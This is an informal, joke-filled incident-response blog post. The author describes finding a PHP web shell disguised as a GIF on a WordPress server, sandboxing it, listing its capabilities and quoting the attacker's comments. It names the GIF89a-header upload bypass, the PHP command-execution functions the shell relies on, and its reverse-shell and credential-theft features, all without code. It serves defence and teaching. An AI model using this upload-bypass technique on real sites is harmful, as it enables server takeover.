🚨 Chapter 1: The "Something feels off" moment

It started like every investigation ever:

"Let me just check logs quickly…"

And boom — chaos.

From the logs:

• /xmlrpc.php getting hammered
• /wp-content/plugins/ being scanned like it's on sale
• Random POST floods

And then this beauty:

/ALFA_DATA/alfacgiapi/perl.alfa

At this point I knew:

"Yeah… this ain't normal traffic. This is someone trying to own the server."

(And they were trying HARD.)

📌 As confirmed in my investigation report → classic recon + enumeration + exploitation chain

🕵️ Chapter 2: The Malware Cosplay 🤡

Then I found it.

A file that looked like an innocent GIF…

But actually:

PHP web shell wearing a GIF costume like it's Comic-Con

This trick:

• Starts with GIF89a header
• Sneaks PHP code after it

Result: 👉 Upload validation: "Seems legit 👍R&quo; 👉 Server: "I will execute this 😈R&quo;

🧪 Chapter 3: Sandbox Time (aka "Let's not nuke production")

Instead of YOLO executing it, I did the only sane thing:

• Moved it into a DMZ VM
• Enabled controlled internet (iNET)
• Observed behavior safely

(Because running malware on prod is a career-ending speedrun)

🔬 Chapter 4: Reverse Engineering — "Okay what does this demon do?"

Opened the code…

And immediately saw this:

shell_exec
exec
system
passthru
proc_open
popen

💀 Bro really said:

"If one doesn't work… I have backups."

📌 Confirmed in analysis → Multiple execution methods = high reliability backdoor

🧠 What it can do (aka full server domination starter pack):

• Execute commands remotely
• Upload / delete / edit files
• Change permissions
• Modify timestamps (anti-forensics 😏)
• Create hidden backups of itself
• Extract WordPress credentials
• Create admin users

Basically:

"Congrats, attacker now owns your server."

🧠 Chapter 5: The Backdoor (Plot Twist Level 💯)

The malware had:

👉 Reverse shell capability 👉 Backconnect to attacker IP

So yeah…

This wasn't just a script. This was a remote control system.

🤡 Chapter 6: The Hacker… helped me??

Now comes the BEST part.

While reversing, I found THIS:

return "Tidak ada metode eksekusi aktif di server by SEO1719.";

And comments like:

// dibuat oleh seo1719

And even…

"Mau backup shell? klik aja kawanku." ("Want to backup shell? Just click it, my friend.")

💀💀💀

BRO LEFT INSTRUCTIONS.

😂 My reaction:

• Me: reverse engineering malware
• Hacker: "Here bro, documentation included"

🇮🇩 Bonus: Indonesian Roast Mode Activated

Then I found this gem:

"Walaupun kurang kuat, setidaknya aku tidak pakai obat kuat."

Translation:

"Even if I'm not strong, at least I don't use enhancement drugs."

💀💀💀

At this point I realized:

I'm not just analyzing malware… I'm reading a developer's personality through code

🛠️ Chapter 7: Tools I Used

🐞 Xdebug

• Step-through execution
• Understand flow
• Track function calls

🧩 PHPModeler

• Visualize structure
• Understand relationships
• Makes messy PHP slightly less painful

🧪 Sandbox VM

• Safe execution
• Behavior monitoring

🛡️ Chapter 8: Mitigation (aka "Get out of my server")

After analysis:

• Removed all malicious files
• Revoked credentials
• Audited users
• Disabled XML-RPC
• Updated everything
• Implemented WAF

📌 Full mitigation steps documented

⚠️ Final Thoughts

This wasn't just a random script.

This was:

• Automated attack chain
• Web shell deployment
• Persistent backdoor
• CMS takeover attempt

And honestly…

The attacker was skilled… but also kinda funny.

😂 TL;DR

• Found anomaly
• Dug into logs
• Found fake GIF malware
• Sandboxed it
• Reverse engineered it
• Realized hacker left comments 💀
• Cleaned everything
• Wrote this blog

🧠 Lesson Learned

Always check logs. Always sandbox malware. And sometimes… Hackers will leave comments like they're writing open-source code.